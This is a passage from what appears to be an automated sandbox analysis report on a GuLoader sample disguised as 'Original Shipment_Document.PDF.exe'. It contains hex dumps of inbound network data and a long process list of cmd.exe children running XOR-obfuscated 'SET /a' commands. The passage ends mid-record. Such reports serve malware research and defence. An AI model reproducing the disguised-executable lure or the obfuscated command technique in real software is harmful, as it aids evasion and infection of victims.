2022-08-05 09:32:58 UTC	206	IN	Data Raw: e6 82 0c 63 d5 64 30 81 4c 4c b4 92 56 a8 53 e4 fb e5 53 79 98 5a 56 77 c5 ae e2 7d 13 82 b7 57 05 17 9d bd 46 75 ea 0c d8 8e ad 31 14 b6 29 dc 00 3a 23 99 fd c5 1a 66 d6 d4 ea 1c 14 14 80 5b 49 3d a2 e2 c8 26 e4 06 af 3e 3c 0f 30 40 ad 3a d1 81 ed 4a 54 af 59 0b c7 a8 e2 bf 2d e6 be 8d 9b a9 c1 d1 a2 ca 87 0d cd e1 f6 ed 6d 8b 05 54 0c fd a1 83 9b 83 67 79 1f 6f f9 27 3d e9 28 64 f6 3e 73 58 05 d0 af 14 f8 cf b9 6b 62 1f a6 21 73 0d d5 4a 84 5a 56 cb 21 65 77 22 af fe a1 24 b5 bc af bb 80 16 76 ce 30 6c f8 25 9f e1 8a 39 47 ec d9 b7 f6 23 b4 d8 e6 84 c6 c3 ff 49 23 fc c8 9b 45 8a 87 8f 3d 36 2b 75 1a 29 d4 55 7b b8 ba 2c 93 b3 b4 f8 db 47 33 b4 10 97 2f 02 80 40 de f1 4e 2a 8d 10 46 73 73 ba d9 c7 14 a4 81 f3 0d ad d2 ed cd 1d a4 ad 5b 61 da 91 d7 2d aa Data Ascii: cd0LLVSSyZVw}WFu1):#f[I=&><0@:JTY-mTgyo'=(d>sXkb!sJZV!ew"$v0l%9G#I#E=6+u)U{,G3/@N*Fss[a-
2022-08-05 09:32:58 UTC	208	IN	Data Raw: 31 21 ae 55 51 71 e6 4e 82 28 89 3a 06 5a 8d f3 3f cc 41 69 f6 2b c5 ae 96 bb 7a 71 a2 9a c5 7a 43 32 5e 60 83 a3 c7 7f d6 7b 6d 68 c5 1a c8 80 a7 1f 82 02 ba a7 d5 e6 1d 52 ba 07 ab 17 f8 f4 fb 56 48 17 93 9f eb 8a 60 0e e8 91 2a ac 62 16 90 8c 4d 41 5d 91 9d ff 1a 80 dd 58 1c 7e 7e a4 1d c2 5c cf a2 33 bb 51 c7 e3 8e 8f 61 b1 4b 77 15 96 4c 65 ad 3a 63 43 ab bd dd b4 a3 d7 64 36 51 15 b9 0e 17 aa 51 f6 e1 d0 90 08 6e f4 96 96 99 78 b8 14 3e 45 ee 58 c4 ae 39 e6 f2 b5 34 ac df 7b b1 3e ff bc 43 0c b6 83 fc 80 23 cf 0c 39 f7 d7 83 00 84 57 16 95 e9 68 dd 8a 16 82 d0 4d 01 40 8e 9a 9f 28 b4 1c 28 24 73 df 8a 56 56 83 af 5f 47 4f 29 b0 34 c9 2c 86 78 06 15 3f 7d a2 63 12 e5 74 2f 92 59 c8 b7 cf 1e c9 8d f4 09 28 eb 44 20 3a 4c 84 d4 0f 0f 3e b1 99 8d 1f 8d Data Ascii: 1!UQqN(:Z?Ai+zqzC2^`{mhRVH`*bMA]X~~\3QaKwLe:cCd6QQnx>EX94{>C#9WhM@(($sVV_GO)4,x?}ct/Y(D :L>

Target ID:	1
Start time:	11:32:15
Start date:	05/08/2022
Path:	C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Original Shipment_Document.PDF.exe"
Imagebase:	0x400000
File size:	341696 bytes
MD5 hash:	626CDEAA4696C819FD07921073F6C740
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.185975230036.0000000003280000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: cmd.eXePID: 6136, Parent PID: 2660

General

Target ID:	3
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x721C070B^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: Conhost.exePID: 6268, Parent PID: 6136

General

Target ID:	4
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.eXePID: 2128, Parent PID: 2660

General

Target ID:	5
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x7C156677^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: Conhost.exePID: 6680, Parent PID: 2128

General

Target ID:	6
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.eXePID: 5048, Parent PID: 2660

General

Target ID:	7
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x03631637^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: Conhost.exePID: 4308, Parent PID: 5048

General

Target ID:	8
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.eXePID: 2836, Parent PID: 2660

General

Target ID:	9
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x5C382120^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 2084, Parent PID: 2836

General

Target ID:	10
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 4988, Parent PID: 2660

General

Target ID:	11
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x7F303920^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 1692, Parent PID: 4988

General

Target ID:	12
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 3360, Parent PID: 2660

General

Target ID:	13
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x78713865^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 4056, Parent PID: 3360

General

Target ID:	14
Start time:	11:32:17
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 7080, Parent PID: 2660

General

Target ID:	15
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x4B6D7569^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 1956, Parent PID: 7080

General

Target ID:	16
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 1860, Parent PID: 2660

General

Target ID:	17
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x19307575^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 4964, Parent PID: 1860

General

Target ID:	18
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 4156, Parent PID: 2660

General

Target ID:	19
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x41616575^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 6888, Parent PID: 4156

General

Target ID:	20
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 7304, Parent PID: 2660

General

Target ID:	21
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09696575^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7312, Parent PID: 7304

General

Target ID:	22
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 7396, Parent PID: 2660

General

Target ID:	23
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x0975752C^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7404, Parent PID: 7396

General

Target ID:	24
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6784, Parent PID: 2660

General

Target ID:	25
Start time:	11:32:18
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x19697965^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5044, Parent PID: 6784

General

Target ID:	26
Start time:	11:32:19
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 748, Parent PID: 2660

General

Target ID:	27
Start time:	11:32:19
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x49796569^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7876, Parent PID: 748

General

Target ID:	28
Start time:	11:32:19
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6148, Parent PID: 2660

General

Target ID:	29
Start time:	11:32:19
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x19307571^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7472, Parent PID: 6148

General

Target ID:	30
Start time:	11:32:19
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6448, Parent PID: 2660

General

Target ID:	31
Start time:	11:32:19
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x15793C65^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5928, Parent PID: 6448

General

Target ID:	32
Start time:	11:32:19
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff759430000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6572, Parent PID: 2660

General

Target ID:	33
Start time:	11:32:19
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09216D75^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 4852, Parent PID: 6572

General

Target ID:	34
Start time:	11:32:20
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 4308, Parent PID: 2660

General

Target ID:	35
Start time:	11:32:20
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x15793C65^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5048, Parent PID: 4308

General

Target ID:	36
Start time:	11:32:20
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 4888, Parent PID: 2660

General

Target ID:	37
Start time:	11:32:20
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09703C6B^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 3208, Parent PID: 4888

General

Target ID:	38
Start time:	11:32:20
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 2952, Parent PID: 2660

General

Target ID:	39
Start time:	11:32:20
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x4B6C7578^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5792, Parent PID: 2952

General

Target ID:	40
Start time:	11:32:20
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 2084, Parent PID: 2660

General

Target ID:	41
Start time:	11:32:20
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x721C070B^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 2836, Parent PID: 2084

General

Target ID:	42
Start time:	11:32:20
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6688, Parent PID: 2660

General

Target ID:	43
Start time:	11:32:20
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x7C156677^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 8188, Parent PID: 6688

General

Target ID:	44
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 8000, Parent PID: 2660

General

Target ID:	45
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x0363032C^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 3008, Parent PID: 8000

General

Target ID:	46
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6164, Parent PID: 2660

General

Target ID:	47
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x4B2D2024^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 6408, Parent PID: 6164

General

Target ID:	48
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 5788, Parent PID: 2660

General

Target ID:	49
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x55183929^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 4964, Parent PID: 5788

General

Target ID:	50
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 408, Parent PID: 2660

General

Target ID:	51
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x563A7D2C^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 6888, Parent PID: 408

General

Target ID:	52
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 7372, Parent PID: 2660

General

Target ID:	53
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09753C65^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7384, Parent PID: 7372

General

Target ID:	54
Start time:	11:32:21
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 7288, Parent PID: 2660

General

Target ID:	55
Start time:	11:32:22
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09216475^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7284, Parent PID: 7288

General

Target ID:	56
Start time:	11:32:22
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 4128, Parent PID: 2660

General

Target ID:	57
Start time:	11:32:22
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09696575^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5044, Parent PID: 4128

General

Target ID:	58
Start time:	11:32:22
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 5272, Parent PID: 2660

General

Target ID:	59
Start time:	11:32:22
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x15793C65^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7876, Parent PID: 5272

General

Target ID:	60
Start time:	11:32:22
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 4804, Parent PID: 2660

General

Target ID:	61
Start time:	11:32:22
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09216675^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7472, Parent PID: 4804

General

Target ID:	62
Start time:	11:32:22
